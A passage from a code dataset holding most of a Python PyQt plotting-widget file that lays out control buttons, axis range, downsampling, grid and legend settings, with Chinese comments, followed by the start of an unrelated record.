\"停止資料紀錄\")\n self.stop = lib.button(path = \"plot/stop1.png\")\n self.pause.hide()\n \"\"\"\n def funPlay(index):\n if index == 0: self.graphics.setDataEnable(True)\n else: self.graphics.setDataEnable(False)\n \n self.play = lib.button(path = 
[\"plot/play.png\", \"plot/pause.png\"], callback = funPlay)\n \n self.delaytime = 0\n def funRecord(index):\n self.delaytime = self.delaytime + 1\n self.parent.timerThread.setDelay(self.delaytime)\n self.record = lib.button(path = [\"plot/record.png\", \"plot/stop.png\"], callback = funRecord)\n funPlay(1)\n \n\n \n \n \n self.drawGraphics = False # 更新圖示\n # self.graphics.setDataEnable(self.drawGraphics)\n \n # if self.drawGraphics: funPlay(\"play\")\n # else: funPlay(\"pause\")\n \n # if self.drawGraphics: self.updateDraw.setCheckState(Qt.Checked)\n # else: self.updateDraw.setCheckState(Qt.Unchecked)\n # self.updateDraw.stateChanged.connect(self.graphics.setDataEnable)\n # self.updateDraw.setToolTip(\"Update graphics\")\n \n \n \n \n \n leftControlList = [self.status, self.play, self.record]\n leftControlLayout = lib.object.setHBoxLayout(leftControlList, spaces = [5])\n \n \n \n \n\n\n \n\n # Image Button\n \n # self.btnImageDataIn = lib.button(path = \"blink/flickr.png\")\n # logger.info(self.btnImageDataIn)\n self.video = lib.button(path = \"video\", key = \"video*.png\")\n \n self.reloadfile = lib.button(path = \"plot/download.png\", callback = self.parent.reloadfile)\n self.cleardata = lib.button(path = \"plot/newfile.png\", callback = self.parent.clearData)\n self.deletefile = lib.button(path = \"plot/delete.png\", callback = self.parent.deleteFile)\n self.exitplot = lib.button(path = \"plot/exit.png\", callback = self.parent.closeGraphics)\n \n\n\n \n \n self.itemmenu = lib.button(path = \"plot/item.png\", callback = self.swapRightMenu, parame = self.itemWidget)\n self.statusmenu = lib.button(path = \"plot/status.png\", callback = self.swapRightMenu, parame = self.statusWidget)\n self.rangemenu = lib.button(path = \"plot/settings.png\", callback = self.swapRightMenu, parame = self.rangeWidget)\n self.settingmenu = lib.button(path = \"plot/cog1.png\", callback = self.swapRightMenu, parame = self.settingWidget)\n self.savemenu = lib.button(path = \"plot/save.png\", callback = self.swapRightMenu, parame = self.saveWidget)\n self.tagsmenu = lib.button(path = \"plot/tags.png\", callback = self.swapRightMenu, parame = self.tagWidget)\n\n \n # 版面風格\n def funInterfaceStyle():\n logger.info(self.plotstyle)\n self.graphics.setPlotStyle(self.plotstyle)\n lib.plotcfg.set(\"plotstyle\", self.plotstyle)\n if self.plotstyle == 0: self.plotstyle = 1\n else: self.plotstyle = 0\n \n self.plotinterface = lib.button(path = \"plot/bright2.png\", callback = funInterfaceStyle)\n self.plotstyle = lib.plotcfg.get(\"plotstyle\", 0)\n funInterfaceStyle()\n\n\n\n\n self.folder = lib.button(path = \"plot/folder.png\", callback = self.parent.openFileDir)\n\n \n # 左邊選項目錄顯示\n def funPlotWin(index):\n self.parent.reportcb.call(self.parent, self.parent.report_winsize, \"\")\n self.contract = lib.button(path = [\"plot/expand.png\", \"plot/contract.png\"], callback = funPlotWin)\n\n # 建立 Rect 或是 Pan 模式\n def funRect(index):\n if index == 0: self.graphics.setMouseMode(True)\n else: self.graphics.setMouseMode(False)\n self.rectplot = lib.button(path = [\"plot/pan.png\", \"plot/rect.png\"], callback = funRect)\n\n \n controlItemList = [lib.object.spacer(-1, 0), self.statusmenu, self.itemmenu, self.rangemenu, self.settingmenu, self.savemenu, self.tagsmenu]\n controlItemList += [self.folder, self.plotinterface, self.contract, self.rectplot, self.cleardata, self.reloadfile, self.deletefile, self.exitplot, self.randomSample]\n\n \n \n \n self.floatWin = False\n def funFloatWindows():\n # if self.floatWin:\n \n \n 
self.floatWin = not self.floatWin\n print(self.floatWin)\n print(self.parent)\n self.parent.hide()\n self.parent.show()\n # self.btnImageFloat.setRelease(funFloatWindows)\n \n \n \n\n \n # btnImageList += [ self.reloadfile, self.btnImageFloat, self.btnImageClear]\n # btnImageLayout = lib.object.setHBoxLayout(btnImageList, spaces = [5])\n\n # lib.object.vseparator()\n\n # plotcontrol = [leftControlLayout, lib.object.spacer(-1, 0), self.rectModeCheck, self.btnImageDataIn, self.randomSample, self.saveRawdata, btnImageLayout]\n \n controlMenuList = [self.video, self.statusmenu, self.itemmenu, self.rangemenu, self.settingmenu, self.savemenu]\n\n \n # controlItemLayout = lib.object.setHBoxLayout(controlItemList, spaces = [5])\n lib.object.setLayout(leftControlList + controlMenuList + controlItemList, self.parent.horizontalLayoutTop, spaces = [5])\n\n \n # lib.object.setLayout([self.btnImageDataIn.getWidget(), self.btnImageClear.getWidget()], self.horizontalLayoutTop)\n # lib.object.setLayout([self.btnImageClose.getWidget()], self.horizontalLayoutTop)\n\n \n\n\n def setCenterLayout(self):\n self.rightWidget = lib.object.setHBoxLayout([], True, margins = [0, 0, 0, 0])\n self.rightLayout = self.rightWidget.layout()\n \n \n self.setPlotLayout()\n self.setItemLayout(True)\n self.setStatusLayout()\n self.setRangeLayout()\n self.setSettingLayout()\n self.setSaveLayout()\n self.setTagLayout()\n \n # lib.object.setLayout([self.controlWidget], self.parent.horizontalLayoutCenter)\n lib.object.setLayout([self.plotWidget, self.rightWidget], self.parent.horizontalLayoutCenter, spaces = [4])\n self.setRightMenu()\n \n \n \n \n \n\n # lib.object.setWidth(widget, 38)\n # lib.object.setWidth(self.rightWidget, self.menuWidth)\n # logger.info(\"objects.getLayout(self.rightLayout)\")\n # logger.info(lib.object.getLayout(self.rightLayout))\n # lib.object.setLayouMargins([self.regionLayout])\n # lib.object.setLayoutSpaces([self.rangeLayout], spaces = [-1])\n \n # lib.object.setLayoutSpaces([self.rangeLayout], spaces = [50])\n \n # lib.object.main.showFullScreen()\n \n \n def setRightMenu(self):\n lib.object.setLayout([self.rangeWidget, self.itemWidget, self.statusWidget, self.settingWidget, self.saveWidget, self.tagWidget], self.rightLayout)\n lib.object.setWidth(self.rightWidget, self.menuWidth)\n self.rightWidget.hide()\n widgetlist = lib.object.getLayout(self.rightLayout)\n right_menu = lib.plotcfg.get(\"plotmenu\", None)\n for index in widgetlist:\n widget = widgetlist[index]\n if lib.object.isinstance(widget, [QtGui.QVBoxLayout, QtGui.QHBoxLayout, QtGui.QGridLayout]): widget = lib.object.getLayout(widget)[0]\n if lib.object.isinstance(widget, QtGui.QWidget):\n lib.object.setLayouMargins([widget.layout()], [0, 0, 0, 0])\n if right_menu == index:\n widget.show()\n self.rightWidget.show()\n else:\n widget.hide()\n\n def swapRightMenu(self, widgetindex):\n widgetlist = lib.object.getLayout(self.rightLayout)\n lib.object.setWidth(self.rightWidget, 0)\n self.rightWidget.hide()\n for index in widgetlist:\n widget = widgetlist[index]\n if lib.object.isinstance(widget, [QtGui.QVBoxLayout, QtGui.QHBoxLayout, QtGui.QGridLayout]): widget = lib.object.getLayout(widget)[0]\n if lib.object.isinstance(widget, QtGui.QWidget):\n if widget != widgetindex: # 關閉其它目錄\n widget.hide()\n elif widgetindex.isHidden(): # 打開指定目錄\n lib.object.setWidth(widgetindex, self.menuWidth)\n lib.object.setWidth(self.rightWidget, self.menuWidth)\n self.rightWidget.show()\n widgetindex.show()\n lib.plotcfg.set(\"plotmenu\", index)\n else: # 關閉指定目錄\n 
widgetindex.hide()\n lib.plotcfg.set(\"plotmenu\", None)\n\n def setBottomLayout(self):\n \n \n # self.xAxisAuto = lib.object.setWidth(QtGui.QCheckBox(\"x - auto\"), 85)\n \n \n \n self.xAxisLabel = lib.object.setWidth(QtGui.QLabel(\"X Axis\"), 30)\n self.xAutoRange = lib.object.setWidth(QtGui.QRadioButton(\"Auto\"), 45)\n self.xManualRange = lib.object.setWidth(QtGui.QRadioButton(\"Range\"), 50)\n # plotcontrol = [self.xAxisLabel, self.xAutoRange, self.xManualRange, lib.object.spacer(-1)]\n\n\n xAxisList = [self.xAxisLabel, self.xAutoRange, self.xManualRange, lib.object.spacer(-1)]\n xAxisLayout = lib.object.setHBoxLayout(xAxisList)\n\n\n # X 軸 Radio 群組設定\n self.xBtnGroup = QButtonGroup()\n self.xBtnGroup.addButton(self.xAutoRange)\n self.xBtnGroup.addButton(self.xManualRange)\n self.xBtnGroup.setExclusive(True) # 連動 xAutoRange 與 xManualRange\n self.xBtnGroup.buttonClicked.connect(self.xModeChange)\n \n \"\"\"\n self.yAxisLabel = lib.object.setWidth(QtGui.QLabel(\"Y Axis\"), 30)\n self.yAutoRange = lib.object.setWidth(QtGui.QRadioButton(\"Auto\"), 45)\n self.yManualRange = lib.object.setWidth(QtGui.QRadioButton(\"Range\"), 50)\n \n \n \n # self.yAxisLabel = QtGui.QLabel(\"Y Axis\")\n # self.yAutoRange = QtGui.QRadioButton(\"Auto\")\n # self.yManualRange = QtGui.QRadioButton(\"Range\")\n # self.yMinRange = lib.object.setWidth(QtGui.QDoubleSpinBox(), 70)\n # self.yMaxRange = lib.object.setWidth(QtGui.QDoubleSpinBox(), 70)\n # self.yAxisOffset = lib.object.setWidth(QtGui.QDoubleSpinBox(), 70)\n # self.yToLabel = QtGui.QLabel(\"-\")\n # self.yToLabel.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n \n \n # self.xRangeSlider = QtGui.QSlider(1)\n # lib.object.setWidth(self.yAxisLabel, 40)\n # lib.object.setWidth(self.yAutoRange, 50)\n # lib.object.setWidth(self.yManualRange, 50)\n # lib.object.setWidth(self.yMinRange, 90)\n # lib.object.setWidth(self.yMaxRange, 90)\n \n # plotcontrol = plotcontrol + [self.yAxisLabel, self.yAutoRange, self.yManualRange, self.yMinRange, \"-\", self.yMaxRange, lib.object.spacer(-1)]\n \n \n yAxisList = [self.yAxisLabel, self.yAutoRange, self.yManualRange, lib.object.spacer(-1)]\n yAxisLayout = lib.object.setHBoxLayout(yAxisList)\n \n \n \n\n \n \n\n # 是否自動更新圖示\n self.drawAutoGraphics = True\n if self.drawAutoGraphics:\n self.xAutoRange.setChecked(True)\n self.xModeChange(self.xAutoRange)\n else:\n self.xManualRange.setChecked(True)\n self.xModeChange(self.xManualRange)\n \"\"\"\n\n\n\n\n\n # plotcontrol = plotcontrol + [self.timeBox, self.xSampleAllRange, self.xSampleSizeRange, self.xSampleNum]\n\n\n\n\n \"\"\"\n self.timeMode = QtGui.QRadioButton(\"Time\")\n self.sampleMode = QtGui.QRadioButton(\"Sample\")\n # 顯示模式群組設定\n self.dataModeGroup = QButtonGroup()\n self.dataModeGroup.addButton(self.timeMode)\n self.dataModeGroup.addButton(self.sampleMode)\n self.dataModeGroup.setExclusive(True)\n self.dataMode = self.timeMode\n self.dataModeGroup.buttonClicked.connect(self.dataModeChange)\n if self.dataMode == self.timeMode: self.timeMode.setChecked(True)\n else: self.sampleMode.setChecked(True)\n self.dataModeChange(self.dataMode)\n \"\"\"\n \n\n\n \n\n\n \n\n \n # lib.object.setLayout({0: plotcontrol}, self.layoutPlotControl)\n lib.object.setLayout([[xAxisLayout]], self.layoutPlotControl)\n\n\n\n def setPlotLayout(self):\n self.plotWidget = lib.object.setVBoxLayout([], True, spaces = [0], margins = [0, 0, 0, 0])\n self.plotLayout = self.plotWidget.layout()\n # X 捲軸設定\n self.xRangeSlider = QtGui.QScrollBar(1)\n [xMinSlider, xMaxSlider] = [0, 10000]\n 
self.xRangeSlider.setRange(xMinSlider, xMaxSlider)\n self.xRangeSlider.setValue(xMaxSlider) # 設定最新的顯示\n self.xRangeSlider.valueChanged.connect(lambda value: self.xRangeChanged([self.xRangeSlider.minimum(), value, self.xRangeSlider.maximum()]))\n lib.object.setLayout([self.graphics, self.xRangeSlider], self.plotLayout, spaces = [0])\n\n def setStatusLayout(self):\n self.statusWidget = lib.object.setGridLayout([], True)\n self.statusLayout = self.statusWidget.layout()\n # self.statusLayout.setColumnMinimumWidth(0, 60)\n \n \n lib.object.setLayoutWidth(self.statusLayout, col = {0: 60})\n \n \n self.timeLabel = QtGui.QLabel(\"00:00:00\")\n self.sampleLabel = QtGui.QLabel(\"0\")\n self.intervalLabel = QtGui.QLabel(\"0.0\")\n # timelist = [\"Time\", self.timeLabel]\n # samplelist = [\"Samples\", self.sampleLabel]\n # separator = lib.painter(h = True) #Painter()\n # separator.update()\n \n # separator = lib.painter() #Painter()\n # separator.setSize(10,500)\n # separator.callback.addCallback(separator.drawVSeparator)\n statuslist = {}\n statuslist[0] = [\"time\", self.timeLabel, lib.object.spacer(0,0)]\n statuslist[1] = [\"sample\", self.sampleLabel]\n statuslist[2] = [\"interval\", self.intervalLabel]\n statuslist[3] = [lib.object.hseparator()]\n statuslist[4] = [lib.object.spacer(0, -1)]\n lib.object.setLayout(statuslist, self.statusLayout)\n \n \n \n \n \n # self.controlWidget = lib.object.setVBoxLayout([self.statusLayout], True)\n # lib.object.setWidth(self.controlWidget, self.rightControlWidth)\n # self.controlLayout = self.controlWidget.layout()\n \n \n \n \n \n # lib.object.setLayout([self.statusLayout], self.horizontalLayoutCenter)\n\n def setTagLayout(self):\n self.tagWidget = lib.object.setVBoxLayout([], True)\n self.tagLayout = self.tagWidget.layout()\n \n \n \n tagsLayout = lib.object.setVBoxLayout([[self.setTitleLabel(\"Tag Setting\", 50), None, lib.object.spaceH()]])\n # lib.object.setLayoutWidth(curveTypeLayout, col = {0: 32})\n lib.object.setLayout([tagsLayout, lib.object.spaceV()], self.tagLayout)\n \n\n def setSaveLayout(self):\n self.saveWidget = lib.object.setVBoxLayout([], True)\n self.saveLayout = self.saveWidget.layout()\n \n self.filename = QtGui.QLineEdit(\"xxxxxx\")\n \n # 儲存檔案設定\n \"\"\"\n def setSaveChange(self, index):\n if self.saveRawdata.checkState() == Qt.Unchecked:\n self.parent.closeFile()\n else:\n if self.graphics.getLogLength(): self.parent.createLogFile1() # 如果有 log 資料 \n \"\"\"\n def funSaveFile():\n logger.info(\"funSaveFile\")\n \n self.savefile = lib.object.setTooltip(QtGui.QCheckBox(\"Save\"), \"曲線資料儲存\")\n # self.savefile.setToolTip(\"曲線資料儲存\")\n self.savefile.stateChanged.connect(funSaveFile)\n \n def funOverwrite(check):\n if check: self.parent.overwrite = True\n else: self.parent.overwrite = False\n\n self.overwrite = lib.object.setTooltip(QtGui.QCheckBox(\"Override File\"), \"原始檔案複寫\")\n self.overwrite.stateChanged.connect(funOverwrite)\n \n # self.serialname = lib.object.setTooltip(QtGui.QCheckBox(\"Serial\"), \"產生\")\n \n self.saveRange = QtGui.QComboBox()\n self.saveRange.addItem(\"Export\")\n self.saveRange.addItem(\"\")\n self.saveRange.addItem(\"latest range\")\n\n\n \n\n self.exportRegion = lib.button(text = \"Export\", callback = self.parent.exportFile)\n\n # self.exportRegion = lib.object.setTooltip(QtGui.QPushButton(\"Export\"), \"區域資料輸出\")\n # self.exportRegion.clicked.connect(self.parent.exportFile)\n\n self.exportRegion1 = QtGui.QPushButton(\"xxxx\")\n self.exportRegion1.clicked.connect(self.parent.exportRangeFile1)\n\n # ====== update 
設置 ======\n self.updateDraw = lib.object.setWidth(QtGui.QCheckBox(\"Update (ms)\"), 85)\n self.updateFreq = QtGui.QSpinBox()\n # plotcontrol = plotcontrol + [self.updateDraw, self.updateRate, lib.object.spacer(-1)]\n\n \n [updateRateMin, updateRateNum, updateRateMax] = [10, 100, 10000]\n \n \n \n \n self.graphics.setDelay(updateRateNum)\n self.updateFreq.setRange(updateRateMin, updateRateMax)\n self.updateFreq.setValue(updateRateNum)\n self.updateFreq.valueChanged.connect(self.graphics.setDelay)\n \n \"\"\"\n self.drawGraphics = True # 更新圖示\n self.graphics.setDrawGraphics(self.drawGraphics)\n if self.drawGraphics: self.updateDraw.setCheckState(Qt.Checked)\n else: self.updateDraw.setCheckState(Qt.Unchecked)\n self.updateDraw.stateChanged.connect(self.graphics.setDrawGraphics)\n self.updateDraw.setToolTip(\"Update graphics\")\n \n \"\"\"\n # self.updateFreq.setToolTip(\"minimal update frequency (ms): %d ~ %d\" % (updateRateMin, updateRateMax))\n lib.object.setTooltip(self.updateFreq, \"Minimum update frequency: %d ~ %d ms\" % (updateRateMin, updateRateMax))\n saveRangeLayout = lib.object.setVBoxLayout([[self.setTitleLabel(\"Data Capture\", 50), None, lib.object.spaceH()], [self.savefile, self.overwrite], [\"Name\", self.filename], [\"freq\", self.updateFreq], [\"Region\", self.exportRegion, self.exportRegion1], [\"Range\", self.saveRange]])\n # lib.object.setLayoutWidth(curveTypeLayout, col = {0: 32})\n lib.object.setLayout([saveRangeLayout, lib.object.spaceV()], self.saveLayout)\n \n\n def setSettingLayout(self):\n self.settingWidget = lib.object.setVBoxLayout([], True)\n self.settingLayout = self.settingWidget.layout()\n\n\n\n\n\n\n \n \n \n curveTypeLayout = lib.object.setGridLayout([[self.setTitleLabel(\"Curve Style\", 70), None, lib.object.spaceH()]])\n # lib.object.setLayoutWidth(curveTypeLayout, col = {0: 32})\n lib.object.setLayout([curveTypeLayout, \"jijij\", lib.object.spaceV()], self.settingLayout)\n # lib.object.setHighlight(self.settingWidget)\n # lib.object.setColor(self.settingWidget, bgcolor = (100, 0, 100))\n \n\n def setRangeLayout(self):\n self.rangeWidget = lib.object.setVBoxLayout([], True)\n self.rangeLayout = self.rangeWidget.layout()\n\n # x 時間軸設定\n [timeRange, timeStep] = [9999999999, 0.01]\n self.xMinRange = QtGui.QDoubleSpinBox()\n self.xMaxRange = QtGui.QDoubleSpinBox()\n self.xMinRange.setRange(-timeRange, timeRange)\n self.xMaxRange.setRange(-timeRange, timeRange)\n self.xMinRange.setSingleStep(timeStep)\n self.xMaxRange.setSingleStep(timeStep)\n self.xMinRange.valueChanged.connect(lambda value: self.xRangeChanged([value, self.xMaxRange.value()]))\n self.xMaxRange.valueChanged.connect(lambda value: self.xRangeChanged([self.xMinRange.value(), value]))\n\n # 顯示全部圖示\n def funXRangeModeChange(checked):\n if checked == Qt.Checked: self.graphics.setDrawAllGraphics(x = False)\n else: self.graphics.setDrawAllGraphics(x = True)\n\n self.drawAllGraphics = False\n self.xAllRange = lib.object.setWidth(QtGui.QCheckBox(\"\"), 14)\n self.xAllRange.stateChanged.connect(funXRangeModeChange)\n if self.drawAllGraphics:\n self.xAllRange.setChecked(Qt.Unchecked)\n funXRangeModeChange(Qt.Unchecked)\n else:\n self.xAllRange.setChecked(Qt.Checked)\n funXRangeModeChange(Qt.Checked)\n \n # x 軸 size 大小\n def funXRangeSizeChange(value):\n if self.reportLock == False:\n self.graphics.setDrawAllGraphics(x = False)\n self.xAllRange.setChecked(Qt.Checked)\n self.graphics.setSampleNum(value)\n [sampleMin, sampleNum, sampleMax] = [0.01, 500, 9999999999] # 預設 sample 數\n self.xSizeRange = 
QtGui.QDoubleSpinBox()\n self.xSizeRange.setRange(sampleMin, sampleMax)\n self.xSizeRange.setSingleStep(sampleMin)\n self.xSizeRange.setValue(sampleNum)\n self.xSizeRange.setToolTip(\"Set time range\")\n self.xSizeRange.valueChanged.connect(lambda value: funXRangeSizeChange(value))\n \n # ====== 時間軸模式 ======\n def funTimeModeChange(status): # 資料顯示型態\n self.timeModeBox.setCurrentIndex(status)\n if self.timeModeBox.currentIndex(): self.graphics.setTimeMode(False) # sample 模式\n else: self.graphics.setTimeMode(True) # time 模式\n\n self.timeModeBox = QtGui.QComboBox()\n self.timeModeBox.addItem(\"Time\")\n self.timeModeBox.addItem(\"Sample\")\n self.timeModeBox.currentIndexChanged.connect(funTimeModeChange)\n funTimeModeChange(1) # 設定時間軸類型\n\n xAxisLayout = lib.object.setGridLayout([[self.setTitleLabel(\"Time Axis\", 60), None, None, lib.object.spaceH()], [\"From\", self.xMinRange], [\"To\", self.xMaxRange], [\"Size\", self.xAllRange, self.xSizeRange], [\"Type\", self.timeModeBox]])\n lib.object.setLayoutWidth(xAxisLayout, col = {0: 32})\n\n # y 資料軸設定\n def funYRangeChange(rangeIndex): # Y 軸區域範圍變動\n if self.reportLock == False:\n self.graphics.setYRangeMode(rangeIndex)\n if self.yViewRange.currentIndex() == 2: self.graphics.setDrawAllGraphics(y = rangeIndex)\n\n [dataRange, dataStep] = [9999999999, 0.01]\n self.yMinRange = QtGui.QDoubleSpinBox()\n self.yMaxRange = QtGui.QDoubleSpinBox()\n self.yMinRange.setRange(-dataRange, dataRange)\n self.yMaxRange.setRange(-dataRange, dataRange)\n self.yMinRange.setSingleStep(dataStep)\n self.yMaxRange.setSingleStep(dataStep)\n self.yMinRange.valueChanged.connect(lambda value: funYRangeChange([value, self.yMaxRange.value()]))\n self.yMaxRange.valueChanged.connect(lambda value: funYRangeChange([self.yMinRange.value(), value]))\n \n # y 軸顯示模式\n def funViewRangeChange(index):\n if index == 0: y = False\n elif index == 1: y = True\n else: y = [self.yMinRange.value(), self.yMaxRange.value()]\n self.graphics.setDrawAllGraphics(y = y)\n\n self.yViewRange = QtGui.QComboBox()\n self.yViewRange.addItem(\"Min range\")\n self.yViewRange.addItem(\"Max range\")\n self.yViewRange.addItem(\"Fixed range\")\n self.yViewRange.currentIndexChanged.connect(funViewRangeChange)\n self.yViewRange.setCurrentIndex(1)\n self.yScaleRange = QtGui.QSlider(Qt.Horizontal)\n self.yScaleRange.setRange(0, 10000)\n self.yScaleRange.setValue(0)\n self.yScaleRange.valueChanged.connect(self.graphics.setYScale)\n yAxisLayout = lib.object.setGridLayout([[self.setTitleLabel(\"Data Axis\", 60), None, None, lib.object.spaceH()], [\"From\", self.yMinRange], [\"To\", self.yMaxRange], [\"View\", self.yViewRange], [\"Scale\", self.yScaleRange]])\n lib.object.setLayoutWidth(yAxisLayout, col = {0: 32})\n \n # downsample 設定\n def funDownSampleMode(mode):\n self.graphics.setDownSampleMode(mode)\n downsample = 2\n self.downsampleMode = QtGui.QComboBox()\n self.downsampleMode.addItem(\"peak\")\n self.downsampleMode.addItem(\"mean\")\n self.downsampleMode.addItem(\"subsample\")\n self.downsampleMode.currentIndexChanged.connect(funDownSampleMode)\n self.downsampleMode.setCurrentIndex(downsample)\n funDownSampleMode(downsample)\n def funDownSampleRange(factor):\n self.downsampleRange.setToolTip(str(factor))\n self.graphics.setDownSampleFactor(factor)\n [downsamplemin, downsamplefactor, downsamplemax] = [1, 10, 100]\n self.downsampleRange = QtGui.QSlider(Qt.Horizontal)\n self.downsampleRange.setRange(downsamplemin, downsamplemax)\n self.downsampleRange.setValue(downsamplefactor)\n 
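        # Added descriptive note: the slider above feeds funDownSampleRange, which
        # forwards the chosen factor to the graphics object. A minimal hedged sketch
        # of what a downsample factor k conventionally means for the three modes
        # offered above (the real logic lives in self.graphics.setDownSampleMode /
        # setDownSampleFactor; y is a plain list of samples):
        #     k = 10
        #     subsampled = y[::k]                                                # "subsample": every k-th point
        #     means = [sum(y[i:i + k]) / k for i in range(0, len(y) - k + 1, k)]  # "mean": block average
        #     peaks = [max(y[i:i + k]) for i in range(0, len(y) - k + 1, k)]      # "peak": block extreme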
self.downsampleRange.valueChanged.connect(funDownSampleRange)\n funDownSampleRange(downsamplefactor)\n \n \n \n downsampleLayout = lib.object.setGridLayout([[self.setTitleLabel(\"Down Sample\", 80), None, None, lib.object.spaceH()], [\"Mode\", self.downsampleMode], [\"Rate\", self.downsampleRange]])\n lib.object.setLayoutWidth(downsampleLayout, col = {0: 32})\n \n \n def funGrid():\n \n if self.xGridLine.checkState() == Qt.Unchecked: value = 0\n else: value = self.gridOpacity.value()\n self.graphics.setPlotGrid(x = value)\n if self.yGridLine.checkState() == Qt.Unchecked: value = 0\n else: value = self.gridOpacity.value()\n self.graphics.setPlotGrid(y = value)\n \"\"\"\n xGrid = self.xGridLine.checkState()\n yGrid = self.yGridLine.checkState()\n value = self.gridOpacity.value()\n logger.info(x)\n \n \n \n \n uu = lambda x: 0 if x == Qt.Unchecked else self.gridOpacity.value()\n logger.info(uu)\n # self.graphics.setPlotGrid(x = lambda x: 0 if x == Qt.Unchecked else self.gridOpacity.value())\n # max = lambda x: 0 if x == Qt.Unchecked else self.gridOpacity.value()\n \"\"\"\n \n [gridMin, gridNum, gridMax] = [0, 128, 255]\n self.xGridLine = QtGui.QCheckBox(\"X\")\n self.yGridLine = QtGui.QCheckBox(\"Y\")\n self.gridOpacity = QtGui.QSlider(Qt.Horizontal)\n self.gridOpacity.setRange(gridMin, gridMax)\n self.gridOpacity.setValue(gridNum)\n self.gridOpacity.valueChanged.connect(lambda value: funGrid())\n \n \n # lib.object.setHighlight(self.xGridLine)\n \n self.xGridLine.stateChanged.connect(lambda value: funGrid())\n self.yGridLine.stateChanged.connect(lambda value: funGrid())\n \n\n \n # def funYGrid():\n # if self.yGridLine.checkState() == Qt.Unchecked: value = 0\n # else: value = self.yGridOpacity.value()\n # self.graphics.setPlotGrid(y = value)\n\n \n\n # self.yGridOpacity = QtGui.QSlider(Qt.Horizontal)\n # self.yGridOpacity.setRange(gridMin, gridMax)\n # self.yGridOpacity.setValue(gridNum)\n # self.yGridOpacity.valueChanged.connect(lambda value: funYGrid())\n\n \n \n plotOptions = [[self.setTitleLabel(\"Plot Options\", 80)], [\"Grid\", self.xGridLine, self.yGridLine, self.gridOpacity]]\n plotOptionsLayout = lib.object.setGridLayout(plotOptions)\n lib.object.setLayoutWidth(plotOptionsLayout, col = {0: 32})\n \n \n funXRangeSizeChange(sampleNum)\n lib.object.setLayout([xAxisLayout, yAxisLayout, downsampleLayout, plotOptionsLayout, lib.object.spaceV()], self.rangeLayout)\n\n # ========================================================================\n # 函數區\n # ========================================================================\n\n \n \n \n \n\n\n\n\n\n\n\n \n\n\n\n\n \n \n\n\n def xModeChange(self, box): # X 軸設定自動或是手動模式\n if box == self.xManualRange: rangeIndex = [self.xRangeSlider.minimum(), self.xRangeSlider.value(), self.xRangeSlider.maximum()] # 捲軸值\n elif box == self.xAutoRange: rangeIndex = None # 不設值\n self.xRangeChanged(rangeIndex)\n\n def xRangeChanged(self, rangeIndex = None): # X 軸區域範圍變動,當 value 值是 None 時則不使用 XRangeMode\n if self.reportLock == False: # 滑鼠直接滑動圖形不驅動\n if rangeIndex != None: self.xManualRange.setChecked(True)\n self.graphics.setXRangeMode(rangeIndex)\n \n\n\n\n\n\n\n # ===== 曲線 Item 選項設置 =====\n def setItemLayout(self, initial = False): # 設定 Item list control\n if initial:\n self.itemWidget = lib.object.setVBoxLayout([], True)\n self.itemLayout = self.itemWidget.layout()\n return\n\n \n\n # 設定 Item \n \n itemhidecheck = QtGui.QCheckBox(\"Legend\")\n itemhidecheck.setCheckState(Qt.Checked)\n itemhidecheck.stateChanged.connect(lambda status: 
self.graphics.setItemLegend(status))\n \n itemshowvaluecheck = QtGui.QCheckBox(\"Value\")\n itemshowvaluecheck.stateChanged.connect(lambda status: self.graphics.setShowItemValue(status))\n \n # ====== Symbol 設置 ======\n self.symbol = lib.object.setWidth(QtGui.QComboBox(), 95)\n self.symbol.addItem(\"curve\")\n self.symbol.addItem(\"circular\")\n self.symbol.addItem(\"square\")\n self.symbol.addItem(\"triangle\")\n self.symbol.addItem(\"diamond\")\n self.symbol.addItem(\"cross\")\n self.symbol.addItem(\"histogram\")\n self.symbol.currentIndexChanged.connect(lambda currentIndex: self.graphics.setCurveType(currentIndex))\n \n \n itemSetting = [[self.setTitleLabel(\"Legend Setting\", 50), None, lib.object.spaceH()], [itemhidecheck, itemshowvaluecheck], [\"Symbol\", self.symbol], [self.setTitleLabel(\"Legend Item\", 60)]]\n settingLayout = lib.object.setVBoxLayout(itemSetting)\n # 設定 LEGEND\n # layout = [[itemhidecheck, itemshowvaluecheck], [\"Symbol\", self.symbol], [self.setTitleLabel(\"Legend Item\", 60)]]\n\n \n\n \n \n # layout = [[itemhidecheck, itemshowvaluecheck], [\"Symbol\", self.symbol], [self.setTitleLabel(\"Legend Item\", 60)]]\n # legendTitleLayout = lib.object.setVBoxLayout(layout)\n\n def funItemChange(checked): # item list 勾選\n sender = self.parent.sender()\n if sender in itemchecklist:\n text = itemchecklist[sender]\n self.graphics.hideLine(text, sender.checkState())\n\n def funDrawItem(painter): # 畫 item\n painter.qp.setPen(painter.getPen(painter.itemColor))\n painter.qp.translate(0, 0)\n painter.qp.drawLine(0, 8, 16, 8)\n\n itemLegend = []\n itemchecklist = {}\n itemColor = self.graphics.getItemColor()\n itemlist = self.graphics.getItem()\n for index in range(len(itemlist)):\n itemPainter = Painter()\n itemPainter.setSize(16, 16)\n itemPainter.itemName = itemlist[index]\n itemPainter.itemColor = itemColor[itemPainter.itemName]\n itemPainter.callback.addCallback(funDrawItem)\n itemcheck = lib.object.setWidth(QtGui.QCheckBox(\"\"), 16)\n itemcheck.setCheckState(Qt.Checked)\n itemchecklist[itemcheck] = itemlist[index]\n itemcheck.stateChanged.connect(funItemChange)\n layout = [itemcheck, itemPainter, itemPainter.itemName, lib.object.spacer(-1,0)]\n itemLegend.append(layout)\n itemLegend.append(lib.object.spacer(0,-1))\n legendWidget = lib.object.setGridLayout(itemLegend, widget = True, spaces = [3, 3], margins = [0, 0, 0, 0])\n legendLayout = legendWidget.layout()\n legendArea = lib.scrollarea(legendWidget)\n lib.object.setColor(legendWidget, bgcolor = 'w')\n\n lib.object.setLayout([settingLayout, legendArea], self.itemLayout)\n\n\n def setTitleLabel(self, text, width, height = 20):\n width = self.menuWidth\n return lib.object.setTitleLabel(\"\" + text + \"\", fontcolor = \"w\", bgcolor = [100, 100, 100], width = width, height = height)\n\n def setButton(self, image, width = -1):\n button = Button(lib.config.imgpath(image))\n if width != -1: lib.object.setWidth(button, width)\n return button\n \n def updateButton(self, button, image, width = -1):\n button.setImage(lib.config.imgpath(image))\n if width != -1: lib.object.setWidth(button, width)\n ","sub_path":"source/ui/widgets/plotter2/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":59425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151596828","text":"import tkinter as tk\nimport re\nimport math\nimport time\nfrom CVRP import 